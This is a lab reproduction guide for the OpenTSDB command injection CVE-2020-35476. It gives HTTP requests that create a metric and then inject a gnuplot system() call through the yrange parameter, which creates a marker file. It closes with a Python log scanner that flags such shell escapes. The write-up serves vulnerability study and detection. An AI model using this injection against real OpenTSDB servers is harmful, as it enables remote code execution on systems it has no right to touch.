2024-11-06 14:10:36 +08:00

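# OpenTSDB Command Injection Vulnerability CVE-2020-35476

## Vulnerability Description

OpenTSDB is a distributed, scalable time series database built on HBase. Versions 2.4.0 and earlier contain a command injection vulnerability.

References:
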
- [OpenTSDB/opentsdb#2051](https://github.com/OpenTSDB/opentsdb/issues/2051)
- [https://packetstormsecurity.com/files/136753/OpenTSDB-Remote-Code-Execution.html](https://packetstormsecurity.com/files/136753/OpenTSDB-Remote-Code-Execution.html)

## Environment Setup

Run the following command in Vulhub to start OpenTSDB 2.4.0:

```
docker compose up -d
```

Once the service has started, visit `http://your-ip:4242` to see the OpenTSDB web interface.

![](images/OpenTSDB%20命令注入漏洞%20CVE-2020-35476/image-20240307165806970.png)

## Vulnerability Reproduction

Exploiting this vulnerability requires knowing the name of a metric. The metric list can be viewed at `http://your-ip:4242/api/suggest?type=metrics&q=&max=10`:

![](images/OpenTSDB%20命令注入漏洞%20CVE-2020-35476/image-20240307165830409.png)

The metric list is empty here. However, this OpenTSDB instance has automatic metric creation enabled (`tsd.core.auto_create_metrics = true`), so we can use the following API to create a metric named `sys.cpu.nice` and add one record:

```
POST /api/put/ HTTP/1.1
Host: your-ip:4242
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 150

{
"metric": "sys.cpu.nice",
"timestamp": 1346846400,
"value": 20,
"tags": {
"host": "web01",
"dc": "lga"
}
}
```
![](images/OpenTSDB%20命令注入漏洞%20CVE-2020-35476/image-20240307165935912.png)

If the target OpenTSDB already has a non-empty metric, the steps above are not needed. Checking the metric list again shows that the metric has been created:

![](images/OpenTSDB%20命令注入漏洞%20CVE-2020-35476/image-20240307170059167.png)

Send the following request. The value of the `m` parameter must contain a metric that has data:

```
GET /q?start=2000/10/21-00:00:00&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[0:system(%27touch%20/tmp/awesome_poc%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json HTTP/1.1
Host: your-ip:4242
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
Connection: close
```
![](images/OpenTSDB%20命令注入漏洞%20CVE-2020-35476/image-20240307170532492.png)

Inside the container, you can see that `touch /tmp/awesome_poc` was executed successfully:

![](images/OpenTSDB%20命令注入漏洞%20CVE-2020-35476/image-20240307170625205.png)
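
A detection check for the `/q` request shown above, as an added example that is not part of the original page or of OpenTSDB: it scans access-log lines for `/q` requests whose graph parameters carry a gnuplot shell escape or a malformed range. The log format (a reverse proxy's common log format in front of port 4242), the sample lines, and all function and constant names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Range options are expected to look like "[low:high]" with numeric or empty bounds.
RANGE_OK = re.compile(r"^\[?\s*-?[\d.]*\s*:\s*-?[\d.]*\s*\]?$")
RANGE_PARAMS = {"xrange", "yrange"}
# gnuplot shell escapes: system(...) and backtick substitution.
SHELL_TOKENS = re.compile(r"system\s*\(|`", re.IGNORECASE)
REQUEST_LINE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (assumed access-log format, documentation IP ranges).
SAMPLE_LOG = [
    '198.51.100.7 - - [07/Mar/2024:17:05:32 +0800] "GET /q?start=1h-ago'
    '&m=sum:sys.cpu.nice&yrange=[0:]&wxh=1516x644&json HTTP/1.1" 200 512',
    '192.0.2.44 - - [07/Mar/2024:17:05:40 +0800] "GET /q?start=2000/10/21-00:00:00'
    '&m=sum:sys.cpu.nice&xrange=10:10'
    '&yrange=[0:system(%27touch%20/tmp/awesome_poc%27)]&json HTTP/1.1" 200 498',
    '198.51.100.7 - - [07/Mar/2024:17:06:01 +0800] '
    '"GET /api/suggest?type=metrics&q=&max=10 HTTP/1.1" 200 2',
]

def suspicious_params(target):
    """Return the sorted names of /q parameters that fail validation."""
    url = urlsplit(target)
    if url.path != "/q":
        return []
    bad = set()
    # parse_qsl percent-decodes values, so %27 and %20 are seen as ' and space.
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if SHELL_TOKENS.search(value):
            bad.add(name)
        elif name in RANGE_PARAMS and value and not RANGE_OK.match(value):
            bad.add(name)
    return sorted(bad)

def scan(log_lines):
    """Return (client, [parameter names]) for every flagged request line."""
    hits = []
    for line in log_lines:
        match = REQUEST_LINE.search(line)
        if match:
            bad = suspicious_params(match.group(1))
            if bad:
                hits.append((line.split()[0], bad))
    return hits

if __name__ == "__main__":
    for client, params in scan(SAMPLE_LOG):
        print(f"ALERT client={client} suspicious /q parameters: {params}")
```

The same allow-list pattern can be enforced at a reverse proxy to reject such requests before they reach OpenTSDB, rather than only alerting on them afterwards.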